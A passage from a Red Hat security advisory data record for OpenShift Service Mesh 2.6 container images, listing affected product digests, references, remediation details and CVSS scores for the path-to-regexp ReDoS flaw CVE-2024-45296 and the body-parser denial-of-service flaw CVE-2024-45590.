"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", 